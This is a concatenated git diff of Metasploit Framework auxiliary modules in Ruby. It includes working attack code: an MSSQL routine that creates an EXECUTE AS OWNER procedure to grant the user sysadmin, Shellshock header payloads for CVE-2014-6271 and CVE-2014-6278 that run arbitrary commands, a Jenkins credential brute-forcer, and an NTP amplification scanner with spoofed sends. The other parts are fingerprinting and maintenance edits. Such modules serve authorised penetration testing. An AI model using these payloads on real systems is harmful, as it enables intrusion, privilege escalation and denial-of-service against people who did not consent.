parse_results = result[:rows]
|
||||
status = parse_results[0][0]
|
||||
|
||||
# Return status
|
||||
return status
|
||||
end
|
||||
|
||||
# Gets trusted databases owned by sysadmins
|
||||
def check_trust_dbs
|
||||
# Setup query
|
||||
sql = "SELECT d.name AS DATABASENAME
|
||||
FROM sys.server_principals r
|
||||
INNER JOIN sys.server_role_members m ON r.principal_id = m.role_principal_id
|
||||
INNER JOIN sys.server_principals p ON
|
||||
p.principal_id = m.member_principal_id
|
||||
inner join sys.databases d on suser_sname(d.owner_sid) = p.name
|
||||
WHERE is_trustworthy_on = 1 AND d.name NOT IN ('MSDB') and r.type = 'R' and r.name = N'sysadmin'"
|
||||
|
||||
result = mssql_query(sql)
|
||||
|
||||
# Return on success
|
||||
return result[:rows]
|
||||
end
|
||||
|
||||
# Checks if user has the db_owner role
|
||||
def check_db_owner(trust_db_list)
|
||||
# Check if the user has the db_owner role is any databases
|
||||
trust_db_list.each do |db|
|
||||
# Setup query
|
||||
sql = "use #{db[0]};select db_name() as db,rp.name as database_role, mp.name as database_user
|
||||
from [#{db[0]}].sys.database_role_members drm
|
||||
join [#{db[0]}].sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
|
||||
join [#{db[0]}].sys.database_principals mp on (drm.member_principal_id = mp.principal_id)
|
||||
where rp.name = 'db_owner' and mp.name = SYSTEM_USER"
|
||||
|
||||
# Run query
|
||||
result = mssql_query(sql)
|
||||
|
||||
# Parse query results
|
||||
parse_results = result[:rows]
|
||||
if parse_results && parse_results.any?
|
||||
print_good("- db_owner on #{db[0]} found!")
|
||||
return db[0]
|
||||
end
|
||||
end
|
||||
|
||||
nil
|
||||
end
|
||||
|
||||
def escalate_privs(dbowner_db)
|
||||
print_status("#{dbowner_db}")
|
||||
# Create the evil stored procedure WITH EXECUTE AS OWNER
|
||||
evil_sql_create = "use #{dbowner_db};
|
||||
DECLARE @myevil as varchar(max)
|
||||
set @myevil = '
|
||||
CREATE PROCEDURE sp_elevate_me
|
||||
WITH EXECUTE AS OWNER
|
||||
as
|
||||
begin
|
||||
EXEC sp_addsrvrolemember ''#{datastore['USERNAME']}'',''sysadmin''
|
||||
end';
|
||||
exec(@myevil);
|
||||
select 1;"
|
||||
mssql_query(evil_sql_create)
|
||||
|
||||
# Run the evil stored procedure
|
||||
evilsql_run = "use #{dbowner_db};
|
||||
DECLARE @myevil2 as varchar(max)
|
||||
set @myevil2 = 'EXEC sp_elevate_me'
|
||||
exec(@myevil2);"
|
||||
mssql_query(evilsql_run)
|
||||
|
||||
# Remove evil procedure
|
||||
evilsql_remove = "use #{dbowner_db};
|
||||
DECLARE @myevil3 as varchar(max)
|
||||
set @myevil3 = 'DROP PROCEDURE sp_elevate_me'
|
||||
exec(@myevil3);"
|
||||
mssql_query(evilsql_remove)
|
||||
|
||||
true
|
||||
end
|
||||
end
|
|
@ -1,34 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Unix Unshadow Utility',
|
||||
'Description' => %Q{
|
||||
This module takes a passwd and shadow file and 'unshadows'
|
||||
them and saves them as linux.hashes loot.
|
||||
},
|
||||
'Author' => ['theLightCosine'],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPath.new('PASSWD_PATH', [true, 'The path to the passwd file']),
|
||||
OptPath.new('SHADOW_PATH', [true, 'The path to the shadow file']),
|
||||
OptAddress.new('IP', [true, 'The IP address if the host the shadow file came from']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
print_error "This module is deprecated and does nothing. It will be removed in the next release!"
|
||||
end
|
||||
|
||||
end
|
|
@ -29,7 +29,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
['URL', 'http://wordpress.org/news/2014/08/wordpress-3-9-2/'],
|
||||
['URL', 'http://www.breaksec.com/?p=6362'],
|
||||
['URL', 'http://mashable.com/2014/08/06/wordpress-xml-blowup-dos/'],
|
||||
['URL', 'https://core.trac.wordpress.org/changeset/29404']
|
||||
['URL', 'https://core.trac.wordpress.org/changeset/29404'],
|
||||
['WPVDB', '7526']
|
||||
],
|
||||
'DisclosureDate'=> 'Aug 6 2014'
|
||||
))
|
||||
|
|
|
@ -26,8 +26,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Author' => 'Brendan Coles <bcoles[at]gmail.com>',
|
||||
'References' =>
|
||||
[
|
||||
['URL' => 'https://doliforge.org/tracker/?func=detail&aid=1212&group_id=144'],
|
||||
['URL' => 'https://github.com/Dolibarr/dolibarr/commit/8642e2027c840752c4357c4676af32fe342dc0cb']
|
||||
['URL', 'https://doliforge.org/tracker/?func=detail&aid=1212&group_id=144'],
|
||||
['URL', 'https://github.com/Dolibarr/dolibarr/commit/8642e2027c840752c4357c4676af32fe342dc0cb']
|
||||
],
|
||||
'DisclosureDate' => 'Jan 12 2014'))
|
||||
register_options(
|
||||
|
|
|
@ -0,0 +1,88 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
# TODO: figure out what these do:
|
||||
# o: valid command, takes no args, does nothing
|
||||
# B, c, F, G, I, M, U, x: all require an "instance id" and possibly other args
|
||||
ALLOWED_COMMANDS = %w(a A i g l p t T u w Z)
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'HP Operations Manager Perfd Environment Scanner',
|
||||
'Description' => %q{
|
||||
This module will enumerate the process list of a remote machine by abusing
|
||||
HP Operation Manager's unauthenticated 'perfd' daemon.
|
||||
},
|
||||
'Author' => [ 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' ],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
commands_help = ALLOWED_COMMANDS.join(',')
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(5227),
|
||||
OptString.new("COMMANDS", [true, "Command(s) to execute (one or more of #{commands_help})", commands_help])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def commands
|
||||
datastore['COMMANDS'].split(/[, ]+/).map(&:strip)
|
||||
end
|
||||
|
||||
def setup
|
||||
super
|
||||
if datastore['COMMANDS']
|
||||
bad_commands = commands - ALLOWED_COMMANDS
|
||||
unless bad_commands.empty?
|
||||
fail ArgumentError, "Bad perfd command(s): #{bad_commands}"
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def run_host(target_host)
|
||||
begin
|
||||
|
||||
connect
|
||||
banner_resp = sock.get_once
|
||||
if banner_resp && banner_resp =~ /^Welcome to the perfd server/
|
||||
banner_resp.strip!
|
||||
print_good("#{target_host}:#{rport}, Perfd server banner: #{banner_resp}")
|
||||
perfd_service = report_service(host: rhost, port: rport, name: "perfd", proto: "tcp", info: banner_resp)
|
||||
sock.puts("\n")
|
||||
|
||||
commands.each do |command|
|
||||
sock.puts("#{command}\n")
|
||||
Rex.sleep(1)
|
||||
command_resp = sock.get_once
|
||||
|
||||
loot_name = "HP Ops Agent perfd #{command}"
|
||||
path = store_loot(
|
||||
"hp.ops.agent.perfd.#{command}",
|
||||
'text/plain',
|
||||
target_host,
|
||||
command_resp,
|
||||
nil,
|
||||
"HP Ops Agent perfd #{command}",
|
||||
perfd_service
|
||||
)
|
||||
print_status("#{target_host}:#{rport} - #{loot_name} saved in: #{path}")
|
||||
end
|
||||
else
|
||||
print_error("#{target_host}:#{rport}, Perfd server banner detection failed!")
|
||||
end
|
||||
disconnect
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue Timeout::Error => e
|
||||
print_error(e.message)
|
||||
end
|
||||
end
|
||||
end
|
|
@ -25,7 +25,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'References' =>
|
||||
[
|
||||
['OSVDB', '88744'],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2012/Dec/242']
|
||||
['URL', 'http://seclists.org/fulldisclosure/2012/Dec/242'],
|
||||
['WPVDB', '6621']
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
|
|
|
@ -29,10 +29,12 @@ class Metasploit4 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [
|
||||
'Stephane Chazelas', # Vulnerability discovery
|
||||
'wvu' # Metasploit module
|
||||
'wvu', # Metasploit module
|
||||
'lcamtuf' # CVE-2014-6278
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2014-6271'],
|
||||
['CVE', '2014-6278'],
|
||||
['OSVDB', '112004'],
|
||||
['EDB', '34765'],
|
||||
['URL', 'https://access.redhat.com/articles/1200223'],
|
||||
|
@ -47,12 +49,14 @@ class Metasploit4 < Msf::Auxiliary
|
|||
OptString.new('METHOD', [true, 'HTTP method to use', 'GET']),
|
||||
OptString.new('HEADER', [true, 'HTTP header to use', 'User-Agent']),
|
||||
OptString.new('CMD', [true, 'Command to run (absolute paths required)',
|
||||
'/usr/bin/id'])
|
||||
'/usr/bin/id']),
|
||||
OptEnum.new('CVE', [true, 'CVE to check/exploit', 'CVE-2014-6271',
|
||||
['CVE-2014-6271', 'CVE-2014-6278']])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check_host(ip)
|
||||
res = req("echo #{marker}")
|
||||
res = req("echo #{marker}", datastore['CVE'])
|
||||
|
||||
if res && res.body.include?(marker * 3)
|
||||
report_vuln(
|
||||
|
@ -85,7 +89,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
def run_host(ip)
|
||||
return unless check_host(ip) == Exploit::CheckCode::Vulnerable
|
||||
|
||||
res = req(datastore['CMD'])
|
||||
res = req(datastore['CMD'], datastore['CVE'])
|
||||
|
||||
if res && res.body =~ /#{marker}(.+)#{marker}/m
|
||||
print_good("#{peer} - #{$1}")
|
||||
|
@ -98,20 +102,31 @@ class Metasploit4 < Msf::Auxiliary
|
|||
end
|
||||
end
|
||||
|
||||
def req(cmd)
|
||||
def req(cmd, cve)
|
||||
case cve
|
||||
when 'CVE-2014-6271'
|
||||
sploit = cve_2014_6271(cmd)
|
||||
when 'CVE-2014-6278'
|
||||
sploit = cve_2014_6278(cmd)
|
||||
end
|
||||
|
||||
send_request_cgi(
|
||||
'method' => datastore['METHOD'],
|
||||
'uri' => normalize_uri(target_uri.path),
|
||||
'headers' => {
|
||||
datastore['HEADER'] => sploit(cmd)
|
||||
datastore['HEADER'] => sploit
|
||||
}
|
||||
)
|
||||
end
|
||||
|
||||
def sploit(cmd)
|
||||
def cve_2014_6271(cmd)
|
||||
%Q{() { :;};echo -e "\\r\\n#{marker}$(#{cmd})#{marker}"}
|
||||
end
|
||||
|
||||
def cve_2014_6278(cmd)
|
||||
%Q{() { _; } >_[$($())] { echo -e "\\r\\n#{marker}$(#{cmd})#{marker}"; }}
|
||||
end
|
||||
|
||||
def marker
|
||||
@marker ||= Rex::Text.rand_text_alphanumeric(rand(42) + 1)
|
||||
end
|
||||
|
|
|
@ -35,11 +35,15 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [true, "Drupal Path", "/"])
|
||||
OptString.new('TARGETURI', [true, "Drupal Path", "/"])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check(base_uri)
|
||||
def base_uri
|
||||
@base_uri ||= "#{normalize_uri(target_uri.path)}?q=admin/views/ajax/autocomplete/user/"
|
||||
end
|
||||
|
||||
def check_host(ip)
|
||||
res = send_request_cgi({
|
||||
'uri' => base_uri,
|
||||
'method' => 'GET',
|
||||
|
@ -47,31 +51,21 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}, 25)
|
||||
|
||||
if not res
|
||||
return false
|
||||
return Exploit::CheckCode::Unknown
|
||||
elsif res and res.body =~ /\<title\>Access denied/
|
||||
# This probably means the Views Module actually isn't installed
|
||||
print_error("#{rhost} - Access denied")
|
||||
return false
|
||||
vprint_error("#{rhost} - Access denied")
|
||||
return Exploit::CheckCode::Safe
|
||||
elsif res and res.message != 'OK' or res.body != '[ ]'
|
||||
return false
|
||||
return Exploit::CheckCode::Safe
|
||||
else
|
||||
return true
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
# Make sure the URIPATH begins with '/'
|
||||
datastore['PATH'] = normalize_uri(datastore['PATH'])
|
||||
|
||||
# Make sure the URIPATH ends with /
|
||||
if datastore['PATH'][-1,1] != '/'
|
||||
datastore['PATH'] = datastore['PATH'] + '/'
|
||||
end
|
||||
|
||||
enum_uri = datastore['PATH'] + "?q=admin/views/ajax/autocomplete/user/"
|
||||
|
||||
# Check if remote host is available or appears vulnerable
|
||||
if not check(enum_uri)
|
||||
unless check_host(ip) == Exploit::CheckCode::Appears
|
||||
print_error("#{ip} does not appear to be vulnerable, will not continue")
|
||||
return
|
||||
end
|
||||
|
@ -83,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
vprint_status("Iterating on letter: #{l}")
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => enum_uri+l,
|
||||
'uri' => base_uri+l,
|
||||
'method' => 'GET',
|
||||
'headers' => { 'Connection' => 'Close' }
|
||||
}, 25)
|
||||
|
|
|
@ -39,8 +39,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
register_options(
|
||||
[
|
||||
# There is no TARGETURI because when Glassfish is installed, the path is /
|
||||
Opt::RPORT(4848),
|
||||
OptString.new('TARGETURI', [true, 'The URI path of the GlassFish Server', '/']),
|
||||
OptString.new('USERNAME',[true, 'A specific username to authenticate as','admin']),
|
||||
OptBool.new('SSL', [false, 'Negotiate SSL for outgoing connections', false]),
|
||||
OptEnum.new('SSLVersion', [false, 'Specify the version of SSL that should be used', 'TLS1', ['SSL2', 'SSL3', 'TLS1']])
|
||||
|
@ -97,7 +97,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
@scanner = Metasploit::Framework::LoginScanner::Glassfish.new(
|
||||
host: ip,
|
||||
port: rport,
|
||||
uri: datastore['URI'],
|
||||
proxies: datastore["PROXIES"],
|
||||
cred_details: @cred_collection,
|
||||
stop_on_success: datastore['STOP_ON_SUCCESS'],
|
||||
|
|
|
@ -33,13 +33,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run_host(ip)
|
||||
begin
|
||||
connect
|
||||
|
||||
res = send_request_raw({'uri' => '/', 'method' => 'GET' })
|
||||
return if not res
|
||||
|
||||
res = send_request_raw({ 'uri' => '/', 'method' => 'GET' })
|
||||
fp = http_fingerprint(:response => res)
|
||||
print_status("#{ip}:#{rport} #{fp}") if fp
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -164,52 +164,37 @@ class Metasploit3 < Msf::Auxiliary
|
|||
infos[td] = tds[idx+1].get_text.to_s.strip if infos.has_key?(td)
|
||||
end
|
||||
|
||||
fprint = {}
|
||||
jinfo = {}
|
||||
|
||||
# print out the goodies
|
||||
infos.each do |k, v|
|
||||
next if v.nil?
|
||||
v = v.strip
|
||||
next if v.length == 0
|
||||
|
||||
jinfo[k.gsub(/\s+/, '_')] = v
|
||||
|
||||
case k
|
||||
when "os.name"
|
||||
vprint_line(" OS: #{v}")
|
||||
report_host({:host => rhost, :os_name => v})
|
||||
fprint['os.product'] = v
|
||||
when "os.version"
|
||||
vprint_line(" OS Version: #{v}")
|
||||
report_host({:host => rhost, :os_flavor => v})
|
||||
fprint['os.version'] = v
|
||||
when "sun.os.patch.level"
|
||||
vprint_line(" Patch Level: #{v}")
|
||||
when "os.arch"
|
||||
vprint_line(" Arch: #{v}")
|
||||
report_note({
|
||||
:type => "system_arch",
|
||||
:host => rhost,
|
||||
:data => "Arch: #{v}",
|
||||
:update => :unique_data
|
||||
})
|
||||
fprint['os.arch'] = v
|
||||
when "user.name"
|
||||
vprint_line(" User: #{v}")
|
||||
report_note({
|
||||
:type => "jenkins_user",
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
:proto => 'tcp',
|
||||
:data => "User: #{v}",
|
||||
:update => :unique_data
|
||||
})
|
||||
when "USERDOMAIN"
|
||||
vprint_line(" Domain: #{v}")
|
||||
report_note({
|
||||
:type => "system_domain",
|
||||
:host => rhost,
|
||||
:data => "Domain: #{v}",
|
||||
:update => :unique_data
|
||||
})
|
||||
fprint['host.domain'] = v
|
||||
when "COMPUTERNAME"
|
||||
vprint_line(" Computer Name: #{v}")
|
||||
report_note({
|
||||
:type => "system_computer",
|
||||
:host => rhost,
|
||||
:data => "Computer Name: #{v}",
|
||||
:update => :unique_data
|
||||
})
|
||||
fprint['host.name'] = v
|
||||
when "SystemDrive"
|
||||
vprint_line(" System Drive: #{v}")
|
||||
when "SHELL"
|
||||
|
@ -222,30 +207,20 @@ class Metasploit3 < Msf::Auxiliary
|
|||
vprint_line(" Home Directory: #{v}")
|
||||
when "user.language"
|
||||
vprint_line(" Language: #{v}")
|
||||
report_note({
|
||||
:type => "system_lang",
|
||||
:host => rhost,
|
||||
:data => "Language: #{v}",
|
||||
:update => :unique_data
|
||||
})
|
||||
fprint['os.language'] = v
|
||||
when "user.country"
|
||||
vprint_line(" Country: #{v}")
|
||||
report_note({
|
||||
:type => "system_country",
|
||||
:host => rhost,
|
||||
:data => "Country: #{v}",
|
||||
:update => :unique_data
|
||||
})
|
||||
when "user.timezone"
|
||||
vprint_line(" Timezone: #{v}")
|
||||
report_note({
|
||||
:type => "system_timezone",
|
||||
:host => rhost,
|
||||
:data => "Timezone: #{v}",
|
||||
:update => :unique_data
|
||||
})
|
||||
end
|
||||
end
|
||||
|
||||
# Report a fingerprint.match for OS fingerprinting support, tied to this service
|
||||
report_note(:host => rhost, :port => rport, :proto => 'tcp', :ntype => 'fingerprint.match', :data => fprint)
|
||||
|
||||
# Report a jenkins information note for future analysis, tied to this service
|
||||
report_note(:host => rhost, :port => rport, :proto => 'tcp', :ntype => 'jenkins.info', :data => jinfo)
|
||||
|
||||
vprint_line('')
|
||||
end
|
||||
end
|
||||
|
|
|
@ -0,0 +1,74 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'metasploit/framework/credential_collection'
|
||||
require 'metasploit/framework/login_scanner/jenkins'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::AuthBrute
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Jenkins-CI Login Utility',
|
||||
'Description' => 'This module attempts to login to a Jenkins-CI instance using a specific user/pass.',
|
||||
'Author' => [ 'Nicholas Starke <starke.nicholas[at]gmail.com>' ],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080)
|
||||
], self.class)
|
||||
|
||||
register_autofilter_ports([ 80, 443, 8080, 8081, 8000 ])
|
||||
|
||||
deregister_options('RHOST')
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
cred_collection = Metasploit::Framework::CredentialCollection.new(
|
||||
blank_passwords: datastore['BLANK_PASSWORDS'],
|
||||
pass_file: datastore['PASS_FILE'],
|
||||
password: datastore['PASSWORD'],
|
||||
user_file: datastore['USER_FILE'],
|
||||
userpass_file: datastore['USERPASS_FILE'],
|
||||
username: datastore['USERNAME'],
|
||||
user_as_pass: datastore['USER_AS_PASS']
|
||||
)
|
||||
|
||||
scanner = Metasploit::Framework::LoginScanner::Jenkins.new(
|
||||
host: ip,
|
||||
port: rport,
|
||||
proxies: datastore['PROXIES'],
|
||||
cred_details: cred_collection,
|
||||
stop_on_success: datastore['STOP_ON_SUCCESS'],
|
||||
connection_timeout: 10,
|
||||
user_agent: datastore['UserAgent'],
|
||||
vhost: datastore['VHOST']
|
||||
)
|
||||
|
||||
scanner.scan! do |result|
|
||||
credential_data = result.to_h
|
||||
credential_data.merge!(
|
||||
module_fullname: fullname,
|
||||
workspace_id: myworkspace_id
|
||||
)
|
||||
if result.success?
|
||||
credential_core = create_credential(credential_data)
|
||||
credential_data[:core] = credential_core
|
||||
create_credential_login(credential_data)
|
||||
|
||||
print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}"
|
||||
else
|
||||
invalidate_login(credential_data)
|
||||
vprint_status "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status})"
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
|
@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Brute force previously found users
|
||||
if not usernames.empty?
|
||||
print_status("#{target_uri} - Brute-forcing previously found accounts...")
|
||||
passwords = load_password_vars(datastore['PASS_FILE'])
|
||||
passwords = load_password_vars
|
||||
usernames.each do |user|
|
||||
passwords.each do |pass|
|
||||
do_login(user, pass)
|
||||
|
|
|
@ -6,62 +6,83 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
include Msf::Exploit::Remote::Udp
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
include Msf::Exploit::Remote::Udp
|
||||
include Msf::Auxiliary::UDPScanner
|
||||
include Msf::Auxiliary::NTP
|
||||
include Msf::Auxiliary::DRDoS
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'NTP Clock Variables Disclosure',
|
||||
'Description' => %q{
|
||||
This module reads the system internal NTP variables. These variables contain
|
||||
'Description' => %q(
|
||||
This module reads the system internal NTP variables. These variables contain
|
||||
potentially sensitive information, such as the NTP software version, operating
|
||||
system version, peers, and more.
|
||||
},
|
||||
'Author' => [ 'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>' ],
|
||||
),
|
||||
'Author' =>
|
||||
[
|
||||
'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>', # original Metasploit module
|
||||
'Jon Hart <jon_hart[at]rapid7.com>' # UDPScanner version for faster scans
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL','http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure' ],
|
||||
[ 'URL', 'http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure' ]
|
||||
]
|
||||
)
|
||||
)
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(123)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
def scanner_process(data, shost, _sport)
|
||||
@results[shost] ||= []
|
||||
@results[shost] << Rex::Proto::NTP::NTPControl.new(data)
|
||||
end
|
||||
|
||||
connect_udp
|
||||
|
||||
readvar = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00" #readvar command
|
||||
print_status("Connecting target #{rhost}:#{rport}...")
|
||||
|
||||
print_status("Sending command")
|
||||
udp_sock.put(readvar)
|
||||
reply = udp_sock.recvfrom(65535, 0.1)
|
||||
if not reply or reply[0].empty?
|
||||
print_error("#{rhost}:#{rport} - Couldn't read NTP variables")
|
||||
return
|
||||
def scan_host(ip)
|
||||
if spoofed?
|
||||
datastore['ScannerRecvWindow'] = 0
|
||||
scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
|
||||
else
|
||||
scanner_send(@probe, ip, datastore['RPORT'])
|
||||
end
|
||||
p_reply = reply[0].split(",")
|
||||
arr_count = 0
|
||||
while ( arr_count < p_reply.size)
|
||||
if arr_count == 0
|
||||
print_good("#{rhost}:#{rport} - #{p_reply[arr_count].slice(12,p_reply[arr_count].size)}") #12 is the adjustment of packet garbage
|
||||
arr_count = arr_count + 1
|
||||
end
|
||||
|
||||
def scanner_prescan(batch)
|
||||
@results = {}
|
||||
print_status("Sending NTP v2 READVAR probes to #{batch[0]}->#{batch[-1]} (#{batch.length} hosts)")
|
||||
@probe = Rex::Proto::NTP::NTPControl.new
|
||||
@probe.version = datastore['VERSION']
|
||||
@probe.operation = 2
|
||||
end
|
||||
|
||||
def scanner_postscan(_batch)
|
||||
@results.keys.each do |k|
|
||||
# TODO: check to see if any of the responses are actually NTP before reporting
|
||||
report_service(
|
||||
host: k,
|
||||
proto: 'udp',
|
||||
port: rport,
|
||||
name: 'ntp',
|
||||
info: @results[k].map { |r| r.payload.slice(0,r.payload_size) }.join.inspect
|
||||
)
|
||||
|
||||
peer = "#{k}:#{rport}"
|
||||
response_map = { @probe => @results[k] }
|
||||
vulnerable, proof = prove_amplification(response_map)
|
||||
what = 'NTP Mode 6 READVAR DRDoS'
|
||||
if vulnerable
|
||||
print_good("#{peer} - Vulnerable to #{what}: #{proof}")
|
||||
report_vuln(
|
||||
host: k,
|
||||
port: rport,
|
||||
proto: 'udp',
|
||||
name: what,
|
||||
refs: references
|
||||
)
|
||||
else
|
||||
print_good("#{rhost}:#{rport} - #{p_reply[arr_count].strip}")
|
||||
arr_count = arr_count + 1
|
||||
vprint_status("#{peer} - Not vulnerable to #{what}: #{proof}")
|
||||
end
|
||||
end
|
||||
disconnect_udp
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
require 'recog'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
@ -34,90 +34,120 @@ class Metasploit3 < Msf::Auxiliary
|
|||
)
|
||||
|
||||
deregister_options('RPORT')
|
||||
deregister_options('SMBDIRECT')
|
||||
@smb_port = 445
|
||||
end
|
||||
|
||||
def rport
|
||||
@rport || datastore['RPORT']
|
||||
@smb_port || datastore['RPORT']
|
||||
end
|
||||
|
||||
def smb_direct
|
||||
@smbdirect || datastore['SMBDirect']
|
||||
(@smb_port == 445)
|
||||
end
|
||||
|
||||
# Fingerprint a single host
|
||||
#
|
||||
def run_host(ip)
|
||||
[[445, true], [139, false]].each do |info|
|
||||
|
||||
@rport = info[0]
|
||||
@smbdirect = info[1]
|
||||
self.simple = nil
|
||||
smb_ports = [445, 139]
|
||||
smb_ports.each do |pnum|
|
||||
@smb_port = pnum
|
||||
self.simple = nil
|
||||
|
||||
begin
|
||||
res = smb_fingerprint()
|
||||
|
||||
if(res['os'] and res['os'] != 'Unknown')
|
||||
#
|
||||
# Create the note hash for smb.fingerprint
|
||||
#
|
||||
conf = {
|
||||
:native_os => res['native_os'],
|
||||
:native_lm => res['native_lm']
|
||||
}
|
||||
|
||||
case res['os']
|
||||
when /Windows/
|
||||
os = OperatingSystems::WINDOWS
|
||||
else
|
||||
case res['sp']
|
||||
when /apple/
|
||||
os = OperatingSystems::MAC_OSX
|
||||
res['os'] = 'Mac OS X'
|
||||
when /ubuntu/
|
||||
os = OperatingSystems::LINUX
|
||||
res['os'] = 'Ubuntu'
|
||||
when /debian/
|
||||
os = OperatingSystems::LINUX
|
||||
res['os'] = 'Debian'
|
||||
else
|
||||
os = OperatingSystems::UNKNOWN
|
||||
end
|
||||
if res['os'] and res['os'] != 'Unknown'
|
||||
|
||||
#
|
||||
# Create the note hash for fingerprint.match
|
||||
#
|
||||
match_conf = { }
|
||||
|
||||
#
|
||||
# Create a descriptive string for service.info
|
||||
#
|
||||
desc = res['os'].dup
|
||||
|
||||
if res['edition'].to_s.length > 0
|
||||
desc << " #{res['edition']}"
|
||||
conf[:os_edition] = res['edition']
|
||||
match_conf['os.edition'] = res['edition']
|
||||
end
|
||||
|
||||
desc = "#{res['os']} #{res['sp']} (language: #{res['lang']})"
|
||||
if(simple.client.default_name)
|
||||
if res['sp'].to_s.length > 0
|
||||
desc << " #{res['sp'].downcase.gsub('service pack ', 'SP')}"
|
||||
conf[:os_sp] = res['sp']
|
||||
match_conf['os.version'] = res['sp']
|
||||
end
|
||||
|
||||
if res['build'].to_s.length > 0
|
||||
desc << " (build:#{res['build']})"
|
||||
conf[:os_build] = res['build']
|
||||
match_conf['os.build'] = res['build']
|
||||
end
|
||||
|
||||
if res['lang'].to_s.length > 0 and res['lang'] != 'Unknown'
|
||||
desc << " (language:#{res['lang']})"
|
||||
conf[:os_lang] = res['lang']
|
||||
match_conf['os.language'] = conf[:os_lang]
|
||||
end
|
||||
|
||||
if simple.client.default_name
|
||||
desc << " (name:#{simple.client.default_name})"
|
||||
conf[:SMBName] = simple.client.default_name
|
||||
match_conf['host.name'] = conf[:SMBName]
|
||||
end
|
||||
|
||||
if(simple.client.default_domain)
|
||||
if simple.client.default_domain
|
||||
desc << " (domain:#{simple.client.default_domain})"
|
||||
conf[:SMBDomain] = simple.client.default_domain
|
||||
match_conf['host.domain'] = conf[:SMBDomain]
|
||||
end
|
||||
|
||||
print_status("#{rhost}:#{rport} is running #{desc}")
|
||||
|
||||
# Report the service with a friendly banner
|
||||
report_service(
|
||||
:host => ip,
|
||||
:port => info[0],
|
||||
:port => rport,
|
||||
:proto => 'tcp',
|
||||
:name => 'smb',
|
||||
:info => desc
|
||||
)
|
||||
|
||||
conf = {
|
||||
:os_flavor => res['os'],
|
||||
:os_name => os,
|
||||
